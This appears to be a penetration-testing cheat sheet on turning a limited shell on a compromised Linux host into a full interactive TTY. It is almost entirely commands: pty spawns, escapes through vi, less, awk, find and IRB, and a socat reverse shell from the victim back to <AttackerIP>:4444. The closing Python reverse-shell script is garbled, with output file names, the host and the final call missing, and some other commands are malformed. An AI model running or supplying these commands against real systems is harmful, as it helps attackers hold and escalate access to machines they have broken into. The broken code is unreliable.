Spawning shells

Non-interactive tty-shell

If you have a non-tty-shell there are certain commands and stuff you can't do. This can happen if you upload reverse shells on a webserver, so that the shell you get is by the user www-data, or similar. These users are not meant to have shells as they don't interact with the system has humans do.

So if you don't have a tty-shell you can't run su, sudo for example. This can be annoying if you manage to get a root password but you can't use it.

Anyways, if you get one of these shells you can upgrade it to a tty-shell using the following methods:

Using python

python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'


echo 'os.system('/bin/bash')'


/bin/sh -i


/bin/bash -i


perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";


ruby: exec "/bin/sh"


awk 'BEGIN {system("/bin/sh")}'


find / -name blahblah 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

More, less, or man

Type more, less, or man command with a file then try one of the following:

'! /bin/sh'


lua: os.execute('/bin/sh')

From within IRB

exec "/bin/sh"

From within VI



:set shell=/bin/bash:shell

or execute

vi ;/bin/bash

once exit vi (:q!) we would get a shell. Helpful in scenarios where the user is asked to input which file to open

From within nmap


Interactive tty-shell

Method #1

Python pty module

python -c 'import pty; pty.spawn("/bin/bash")'

Method #2

Using socat

So if you manage to upgrade to a non-interactive tty-shell you will still have a limited shell. You won't be able to use the up and down arrows, you won't have tab-completion. This might be really frustrating if you stay in that shell for long. It can also be more risky, if a execution gets stuck you cant use Ctr-C or Ctr-Z without killing your session. However that can be fixed using socat. Follow these instructions.

On Kali (listen):

socat file:`tty`,raw,echo=0 tcp-listen:4444  

On Victim (launch):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<AttackerIP>:4444

Method #3

Using stty

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

Misc: Simple Reverse Shell

echo "import socket" >
echo "import subprocess" >>
echo "import os" >>
echo "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)" >>
echo 's.connect(("",443))' >>
echo "os.dup2(s.fileno(),0)" >>
echo "os.dup2(s.fileno(),1)" >>
echo "os.dup2(s.fileno(),2)" >>
echo '["/bin/sh","-i"])' >>


results matching ""

    No results matching ""